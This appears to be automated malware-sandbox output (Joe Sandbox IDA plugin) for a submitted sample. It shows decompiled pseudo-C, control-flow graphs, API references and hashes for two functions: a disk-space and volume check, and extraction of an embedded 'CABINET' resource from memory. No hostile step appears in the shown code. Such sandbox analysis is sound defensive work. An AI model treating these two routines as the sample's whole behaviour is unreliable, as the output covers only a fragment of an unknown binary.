                                                                                                                                                                                                      control_flow_graph 324 e7597d-e759b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 e759dd-e75a1b GetDiskFreeSpaceA 324->325 326 e759bb-e759d8 call e744b9 call e76285 324->326 327 e75ba1-e75bde memset call e76285 GetLastError FormatMessageA 325->327 328 e75a21-e75a4a MulDiv 325->328 345 e75c05-e75c14 call e76ce0 326->345 337 e75be3-e75bfc call e744b9 SetCurrentDirectoryA 327->337 328->327 331 e75a50-e75a6c GetVolumeInformationA 328->331 334 e75ab5-e75aca SetCurrentDirectoryA 331->334 335 e75a6e-e75ab0 memset call e76285 GetLastError FormatMessageA 331->335 339 e75acc-e75ad1 334->339 335->337 351 e75c02 337->351 343 e75ad3-e75ad8 339->343 344 e75ae2-e75ae4 339->344 343->344 347 e75ada-e75ae0 343->347 349 e75ae7-e75af8 344->349 350 e75ae6 344->350 347->339 347->344 353 e75af9-e75afb 349->353 350->349 354 e75c04 351->354 355 e75b05-e75b08 353->355 356 e75afd-e75b03 353->356 354->345 357 e75b20-e75b27 355->357 358 e75b0a-e75b1b call e744b9 355->358 356->353 356->355 360 e75b52-e75b5b 357->360 361 e75b29-e75b33 357->361 358->351 364 e75b62-e75b6d 360->364 361->360 363 e75b35-e75b50 361->363 363->364 365 e75b76-e75b7d 364->365 366 e75b6f-e75b74 364->366 368 e75b83 365->368 369 e75b7f-e75b81 365->369 367 e75b85 366->367 370 e75b87-e75b94 call e7268b 367->370 371 e75b96-e75b9f 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                                                                      			E00E7597D(CHAR* __ecx, signed char __edx, void* __edi, char _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v788;
                                                                                                                                                                                                      				long _v792;
                                                                                                                                                                                                      				long _v796;
                                                                                                                                                                                                      				long _v800;
                                                                                                                                                                                                      				signed int _v804;
                                                                                                                                                                                                      				long _v808;
                                                                                                                                                                                                      				int _v812;
                                                                                                                                                                                                      				long _v816;
                                                                                                                                                                                                      				long _v820;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				signed int _t55;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                                      				signed int _t73;
                                                                                                                                                                                                      				signed short _t78;
                                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                                      				int _t102;
                                                                                                                                                                                                      				unsigned int _t103;
                                                                                                                                                                                                      				unsigned int _t105;
                                                                                                                                                                                                      				signed int _t111;
                                                                                                                                                                                                      				long _t112;
                                                                                                                                                                                                      				signed int _t116;
                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                      				signed int _t119;
                                                                                                                                                                                                      				signed int _t120;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t114 = __edi;
                                                                                                                                                                                                      				_t46 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                      				_v804 = __edx;
                                                                                                                                                                                                      				_t118 = __ecx;
                                                                                                                                                                                                      				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                      				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                      				if(_t50 != 0) {
                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                      					_v796 = 0;
                                                                                                                                                                                                      					_v792 = 0;
                                                                                                                                                                                                      					_v800 = 0;
                                                                                                                                                                                                      					_v808 = 0;
                                                                                                                                                                                                      					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                      					__eflags = _t55;
                                                                                                                                                                                                      					if(_t55 == 0) {
                                                                                                                                                                                                      						L29:
                                                                                                                                                                                                      						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                      						 *0xe79124 = E00E76285();
                                                                                                                                                                                                      						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                      						_t110 = 0x4b0;
                                                                                                                                                                                                      						L30:
                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                      						E00E744B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                      						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                      						L31:
                                                                                                                                                                                                      						_t66 = 0;
                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                      						L32:
                                                                                                                                                                                                      						_pop(_t114);
                                                                                                                                                                                                      						goto L33;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t69 = _v792 * _v796;
                                                                                                                                                                                                      					_v812 = _t69;
                                                                                                                                                                                                      					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                      					__eflags = _t116;
                                                                                                                                                                                                      					if(_t116 == 0) {
                                                                                                                                                                                                      						goto L29;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                      					__eflags = _t73;
                                                                                                                                                                                                      					if(_t73 != 0) {
                                                                                                                                                                                                      						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                      						_t101 =  &_v16;
                                                                                                                                                                                                      						_t111 = 6;
                                                                                                                                                                                                      						_t119 = _t118 - _t101;
                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                      							__eflags = _t22;
                                                                                                                                                                                                      							if(_t22 == 0) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                      							__eflags = _t87;
                                                                                                                                                                                                      							if(_t87 == 0) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *_t101 = _t87;
                                                                                                                                                                                                      							_t101 = _t101 + 1;
                                                                                                                                                                                                      							_t111 = _t111 - 1;
                                                                                                                                                                                                      							__eflags = _t111;
                                                                                                                                                                                                      							if(_t111 != 0) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t111;
                                                                                                                                                                                                      						if(_t111 == 0) {
                                                                                                                                                                                                      							_t101 = _t101 - 1;
                                                                                                                                                                                                      							__eflags = _t101;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *_t101 = 0;
                                                                                                                                                                                                      						_t112 = 0x200;
                                                                                                                                                                                                      						_t102 = _v812;
                                                                                                                                                                                                      						_t78 = 0;
                                                                                                                                                                                                      						_t118 = 8;
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							__eflags = _t102 - _t112;
                                                                                                                                                                                                      							if(_t102 == _t112) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t112 = _t112 + _t112;
                                                                                                                                                                                                      							_t78 = _t78 + 1;
                                                                                                                                                                                                      							__eflags = _t78 - _t118;
                                                                                                                                                                                                      							if(_t78 < _t118) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t78 - _t118;
                                                                                                                                                                                                      						if(_t78 != _t118) {
                                                                                                                                                                                                      							__eflags =  *0xe79a34 & 0x00000008;
                                                                                                                                                                                                      							if(( *0xe79a34 & 0x00000008) == 0) {
                                                                                                                                                                                                      								L20:
                                                                                                                                                                                                      								_t103 =  *0xe79a38; // 0x0
                                                                                                                                                                                                      								_t110 =  *((intOrPtr*)(0xe789e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                      								L21:
                                                                                                                                                                                                      								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                      								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                      									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                      									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                      										__eflags = _t103 - _t116;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags = _t110 - _t116;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                      									 *0xe79124 = 0;
                                                                                                                                                                                                      									_t66 = 1;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t40 =  &_a4; // 0xe76277
                                                                                                                                                                                                      									_t66 = E00E7268B( *_t40, _t110, _t103,  &_v16);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                      							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t105 =  *0xe79a38; // 0x0
                                                                                                                                                                                                      							_t110 =  *((intOrPtr*)(0xe789e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xe789e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                      							_t103 = (_t105 >> 2) +  *0xe79a38;
                                                                                                                                                                                                      							goto L21;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t110 = 0x4c5;
                                                                                                                                                                                                      						E00E744B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						goto L31;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                      					 *0xe79124 = E00E76285();
                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                      					_t110 = 0x4f9;
                                                                                                                                                                                                      					goto L30;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t110 = 0x4bc;
                                                                                                                                                                                                      					E00E744B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					 *0xe79124 = E00E76285();
                                                                                                                                                                                                      					_t66 = 0;
                                                                                                                                                                                                      					L33:
                                                                                                                                                                                                      					return E00E76CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}



































                                                                                                                                                                                                      0x00e7597d
                                                                                                                                                                                                      0x00e75988
                                                                                                                                                                                                      0x00e7598f
                                                                                                                                                                                                      0x00e7599a
                                                                                                                                                                                                      0x00e759a6
                                                                                                                                                                                                      0x00e759a8
                                                                                                                                                                                                      0x00e759af
                                                                                                                                                                                                      0x00e759b9
                                                                                                                                                                                                      0x00e759dd
                                                                                                                                                                                                      0x00e759e4
                                                                                                                                                                                                      0x00e759f1
                                                                                                                                                                                                      0x00e759fe
                                                                                                                                                                                                      0x00e75a0b
                                                                                                                                                                                                      0x00e75a13
                                                                                                                                                                                                      0x00e75a19
                                                                                                                                                                                                      0x00e75a1b
                                                                                                                                                                                                      0x00e75ba1
                                                                                                                                                                                                      0x00e75baf
                                                                                                                                                                                                      0x00e75bbd
                                                                                                                                                                                                      0x00e75bd8
                                                                                                                                                                                                      0x00e75bde
                                                                                                                                                                                                      0x00e75be3
                                                                                                                                                                                                      0x00e75bec
                                                                                                                                                                                                      0x00e75bf0
                                                                                                                                                                                                      0x00e75bfc
                                                                                                                                                                                                      0x00e75c02
                                                                                                                                                                                                      0x00e75c02
                                                                                                                                                                                                      0x00e75c02
                                                                                                                                                                                                      0x00e75c04
                                                                                                                                                                                                      0x00e75c04
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75c04
                                                                                                                                                                                                      0x00e75a27
                                                                                                                                                                                                      0x00e75a3a
                                                                                                                                                                                                      0x00e75a46
                                                                                                                                                                                                      0x00e75a48
                                                                                                                                                                                                      0x00e75a4a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75a64
                                                                                                                                                                                                      0x00e75a6a
                                                                                                                                                                                                      0x00e75a6c
                                                                                                                                                                                                      0x00e75abc
                                                                                                                                                                                                      0x00e75ac2
                                                                                                                                                                                                      0x00e75ac9
                                                                                                                                                                                                      0x00e75aca
                                                                                                                                                                                                      0x00e75aca
                                                                                                                                                                                                      0x00e75acc
                                                                                                                                                                                                      0x00e75acc
                                                                                                                                                                                                      0x00e75acf
                                                                                                                                                                                                      0x00e75ad1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75ad3
                                                                                                                                                                                                      0x00e75ad6
                                                                                                                                                                                                      0x00e75ad8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75ada
                                                                                                                                                                                                      0x00e75adc
                                                                                                                                                                                                      0x00e75add
                                                                                                                                                                                                      0x00e75add
                                                                                                                                                                                                      0x00e75ae0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75ae0
                                                                                                                                                                                                      0x00e75ae2
                                                                                                                                                                                                      0x00e75ae4
                                                                                                                                                                                                      0x00e75ae6
                                                                                                                                                                                                      0x00e75ae6
                                                                                                                                                                                                      0x00e75ae6
                                                                                                                                                                                                      0x00e75ae9
                                                                                                                                                                                                      0x00e75aeb
                                                                                                                                                                                                      0x00e75af0
                                                                                                                                                                                                      0x00e75af6
                                                                                                                                                                                                      0x00e75af8
                                                                                                                                                                                                      0x00e75af9
                                                                                                                                                                                                      0x00e75af9
                                                                                                                                                                                                      0x00e75afb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75afd
                                                                                                                                                                                                      0x00e75aff
                                                                                                                                                                                                      0x00e75b00
                                                                                                                                                                                                      0x00e75b03
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75b03
                                                                                                                                                                                                      0x00e75b05
                                                                                                                                                                                                      0x00e75b08
                                                                                                                                                                                                      0x00e75b20
                                                                                                                                                                                                      0x00e75b27
                                                                                                                                                                                                      0x00e75b52
                                                                                                                                                                                                      0x00e75b52
                                                                                                                                                                                                      0x00e75b5b
                                                                                                                                                                                                      0x00e75b62
                                                                                                                                                                                                      0x00e75b6b
                                                                                                                                                                                                      0x00e75b6d
                                                                                                                                                                                                      0x00e75b76
                                                                                                                                                                                                      0x00e75b7d
                                                                                                                                                                                                      0x00e75b83
                                                                                                                                                                                                      0x00e75b7f
                                                                                                                                                                                                      0x00e75b7f
                                                                                                                                                                                                      0x00e75b7f
                                                                                                                                                                                                      0x00e75b6f
                                                                                                                                                                                                      0x00e75b72
                                                                                                                                                                                                      0x00e75b72
                                                                                                                                                                                                      0x00e75b85
                                                                                                                                                                                                      0x00e75b98
                                                                                                                                                                                                      0x00e75b9e
                                                                                                                                                                                                      0x00e75b87
                                                                                                                                                                                                      0x00e75b8c
                                                                                                                                                                                                      0x00e75b8f
                                                                                                                                                                                                      0x00e75b8f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75b85
                                                                                                                                                                                                      0x00e75b29
                                                                                                                                                                                                      0x00e75b33
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75b35
                                                                                                                                                                                                      0x00e75b48
                                                                                                                                                                                                      0x00e75b4a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75b4a
                                                                                                                                                                                                      0x00e75b0f
                                                                                                                                                                                                      0x00e75b16
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75b16
                                                                                                                                                                                                      0x00e75a7c
                                                                                                                                                                                                      0x00e75a8a
                                                                                                                                                                                                      0x00e75aa5
                                                                                                                                                                                                      0x00e75aab
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e759bb
                                                                                                                                                                                                      0x00e759c0
                                                                                                                                                                                                      0x00e759c7
                                                                                                                                                                                                      0x00e759d1
                                                                                                                                                                                                      0x00e759d6
                                                                                                                                                                                                      0x00e75c05
                                                                                                                                                                                                      0x00e75c14
                                                                                                                                                                                                      0x00e75c14

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00E759A8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(?), ref: 00E759AF
                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00E75A13
                                                                                                                                                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 00E75A40
                                                                                                                                                                                                      • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E75A64
                                                                                                                                                                                                      • memset.MSVCRT ref: 00E75A7C
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00E75A98
                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00E75AA5
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00E75BFC
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                        • Part of subcall function 00E76285: GetLastError.KERNEL32(00E75BBC), ref: 00E76285
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                      • String ID: wb
                                                                                                                                                                                                      • API String ID: 4237285672-1758207633
                                                                                                                                                                                                      • Opcode ID: f4723643059707bf341da874106f7989ebf97bc9de26899e6b1bcfeb670a79ab
                                                                                                                                                                                                      • Instruction ID: fafe6e99d4763cc3484587b122920b47d53765e0da1e4036467440658e920024
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4723643059707bf341da874106f7989ebf97bc9de26899e6b1bcfeb670a79ab
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7171B3B290160CAFEB15DB60CC85FFB77ACEB88304F5495A9F50DF6141DA709E888B60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 374 e74fe0-e7501a call e7468f FindResourceA LoadResource LockResource 377 e75161-e75163 374->377 378 e75020-e75027 374->378 379 e75057-e7505e call e74efd 378->379 380 e75029-e75051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->380 383 e75060-e75077 call e744b9 379->383 384 e7507c-e750b4 379->384 380->379 388 e75107-e7510e 383->388 389 e750b6-e750da 384->389 390 e750e8-e75104 call e744b9 384->390 392 e75110-e75117 FreeResource 388->392 393 e7511d-e7511f 388->393 398 e75106 389->398 402 e750dc 389->402 390->398 392->393 395 e75121-e75127 393->395 396 e7513a-e75141 393->396 395->396 399 e75129-e75135 call e744b9 395->399 400 e75143-e7514a 396->400 401 e7515f 396->401 398->388 399->396 400->401 404 e7514c-e75159 SendMessageA 400->404 401->377 405 e750e3-e750e6 402->405 404->401 405->390 405->398
                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E00E74FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				struct HWND__* _t9;
                                                                                                                                                                                                      				int _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      				struct HWND__* _t27;
                                                                                                                                                                                                      				intOrPtr _t29;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				CHAR* _t36;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				intOrPtr _t47;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                      				_t36 = "CABINET";
                                                                                                                                                                                                      				 *0xe79144 = E00E7468F(_t36, 0, 0);
                                                                                                                                                                                                      				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                      				 *0xe79140 = _t8;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					return _t8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t9 =  *0xe78584; // 0x0
                                                                                                                                                                                                      				if(_t9 != 0) {
                                                                                                                                                                                                      					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                      					ShowWindow(GetDlgItem( *0xe78584, 0x841), 5); // executed
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t10 = E00E74EFD(0, 0); // executed
                                                                                                                                                                                                      				if(_t10 != 0) {
                                                                                                                                                                                                      					__imp__#20(E00E74CA0, E00E74CC0, E00E74980, E00E74A50, E00E74AD0, E00E74B60, E00E74BC0, 1, 0xe79148, _t33);
                                                                                                                                                                                                      					_t34 = _t10;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						_t29 =  *0xe79148; // 0x0
                                                                                                                                                                                                      						_t24 =  *0xe78584; // 0x0
                                                                                                                                                                                                      						E00E744B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#22(_t34, "*MEMCAB", 0xe71140, 0, E00E74CD0, 0, 0xe79140); // executed
                                                                                                                                                                                                      					_t37 = _t10;
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#23(_t34); // executed
                                                                                                                                                                                                      					if(_t10 != 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 =  *0xe78584; // 0x0
                                                                                                                                                                                                      					E00E744B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_t12 =  *0xe79140; // 0x0
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						FreeResource(_t12);
                                                                                                                                                                                                      						 *0xe79140 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						_t47 =  *0xe791d8; // 0x0
                                                                                                                                                                                                      						if(_t47 == 0) {
                                                                                                                                                                                                      							E00E744B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(( *0xe78a38 & 0x00000001) == 0 && ( *0xe79a34 & 0x00000001) == 0) {
                                                                                                                                                                                                      						SendMessageA( *0xe78584, 0xfa1, _t37, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t37;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}
















                                                                                                                                                                                                      0x00e74fe0
                                                                                                                                                                                                      0x00e74fe6
                                                                                                                                                                                                      0x00e74ff9
                                                                                                                                                                                                      0x00e7500d
                                                                                                                                                                                                      0x00e75013
                                                                                                                                                                                                      0x00e7501a
                                                                                                                                                                                                      0x00e75163
                                                                                                                                                                                                      0x00e75163
                                                                                                                                                                                                      0x00e75020
                                                                                                                                                                                                      0x00e75027
                                                                                                                                                                                                      0x00e75037
                                                                                                                                                                                                      0x00e75051
                                                                                                                                                                                                      0x00e75051
                                                                                                                                                                                                      0x00e75057
                                                                                                                                                                                                      0x00e7505e
                                                                                                                                                                                                      0x00e750a7
                                                                                                                                                                                                      0x00e750ad
                                                                                                                                                                                                      0x00e750b4
                                                                                                                                                                                                      0x00e750e8
                                                                                                                                                                                                      0x00e750e8
                                                                                                                                                                                                      0x00e750ee
                                                                                                                                                                                                      0x00e750ff
                                                                                                                                                                                                      0x00e75104
                                                                                                                                                                                                      0x00e75106
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75106
                                                                                                                                                                                                      0x00e750cd
                                                                                                                                                                                                      0x00e750d3
                                                                                                                                                                                                      0x00e750da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e750dd
                                                                                                                                                                                                      0x00e750e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75060
                                                                                                                                                                                                      0x00e75060
                                                                                                                                                                                                      0x00e75070
                                                                                                                                                                                                      0x00e75075
                                                                                                                                                                                                      0x00e75107
                                                                                                                                                                                                      0x00e75107
                                                                                                                                                                                                      0x00e7510e
                                                                                                                                                                                                      0x00e75111
                                                                                                                                                                                                      0x00e75117
                                                                                                                                                                                                      0x00e75117
                                                                                                                                                                                                      0x00e7511f
                                                                                                                                                                                                      0x00e75121
                                                                                                                                                                                                      0x00e75127
                                                                                                                                                                                                      0x00e75135
                                                                                                                                                                                                      0x00e75135
                                                                                                                                                                                                      0x00e75127
                                                                                                                                                                                                      0x00e75141
                                                                                                                                                                                                      0x00e75159
                                                                                                                                                                                                      0x00e75159
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7515f

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746A0
                                                                                                                                                                                                        • Part of subcall function 00E7468F: SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: memcpy_s.MSVCRT ref: 00E746E5
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00E74FFE
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00E75006
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00E7500D
                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,00000842), ref: 00E75030
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00E75037
                                                                                                                                                                                                      • GetDlgItem.USER32(00000841,00000005), ref: 00E7504A
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00E75051
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00E75111
                                                                                                                                                                                                      • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00E75159
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
